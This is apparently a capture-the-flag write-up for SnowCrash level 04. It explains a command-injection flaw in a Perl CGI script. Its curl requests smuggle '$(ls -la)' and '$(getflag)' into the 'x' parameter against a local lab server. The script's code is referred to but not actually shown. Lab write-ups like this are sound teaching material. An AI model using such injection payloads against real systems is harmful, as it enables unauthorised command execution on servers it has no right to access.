Introduction
In level 04, we encountered a Perl CGI script (level04.pl
) vulnerable to command injection. By manipulating the input parameter, we were able to execute arbitrary commands on the server.
Perl CGI Code
1 | level04@SnowCrash:~$ cat level04.pl |
Vulnerability
The Perl script listens on port 4747 and accepts an “x” parameter via HTTP GET requests. It then directly echoes the parameter value without proper sanitization, leading to command injection.
Exploitation
Testing the Script
We tested the script by providing simple input:1
curl -d x="test" http://127.0.0.1:4747
Result: test
Exploiting Command Injection
We injected commands to list files in the directory:1
curl -d x="\$(ls -la)" http://127.0.0.1:4747
Result: Directory listing displayed.
Obtaining the Flag
Finally, we executed getflag to retrieve the flag:1
curl -d x="\$(getflag)" http://127.0.0.1:4747
Conclusion
By exploiting the command injection vulnerability in the Perl CGI script, we successfully executed arbitrary commands on the system, ultimately obtaining the flag for level 04.